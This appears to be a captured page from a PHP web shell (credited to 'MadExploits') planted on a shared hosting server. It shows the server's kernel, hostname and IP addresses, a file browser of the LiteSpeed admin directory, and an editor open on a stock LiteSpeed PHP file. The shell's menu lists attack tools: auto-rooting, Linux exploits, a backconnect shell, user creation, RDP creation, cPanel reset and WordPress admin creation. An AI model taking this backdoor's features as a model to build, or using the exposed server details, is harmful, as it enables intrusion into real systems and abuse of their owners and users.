Linux server220.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
: 198.54.116.164 | : 216.73.216.27
Cant Read [ /etc/named.conf ]
7.4.33
adnangch
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
lsws /
admin /
html.6.3.2 /
service /
[ HOME SHELL ]
Name
Size
Permission
Action
blockip_html.php
648
B
-rw-r--r--
graph_html.php
7.04
KB
-rw-r--r--
graph_xml.php
3.21
KB
-rw-r--r--
homeCont.php
5.3
KB
-rw-r--r--
logViewer.php
2.1
KB
-rw-r--r--
realtimeReport.php
11.44
KB
-rw-r--r--
realtimeReqReport.php
6.89
KB
-rw-r--r--
restart.html
634
B
-rw-r--r--
serviceMgr.php
2.07
KB
-rw-r--r--
verMgrCont.php
3.42
KB
-rw-r--r--
verMgrDownload.php
525
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : blockip_html.php
<?php require_once('../includes/auth.php'); $stats = new STATS(); $stats->parse_all(); $blocked_count = count($stats->blocked_ip); $help_key = 'antiddos_blocked_ip'; $dhelp_item = DATTR_HELP::GetInstance()->GetItem($help_key); $help = '  ' . $dhelp_item->render($help_key); echo GUI::header(); ?> <table class="xtbl" width="100%" border="0" cellpadding="4" cellspacing="1"> <tr height="15"><td class="xtbl_title">Current Blocked IP List (Total <?php echo $blocked_count . ')' . $help; ?> </tr> <tr class="xtbl_value"><td> <?php echo join(', ', $stats->blocked_ip); ?> </td></tr> </table> <?php echo GUI::footer();
Close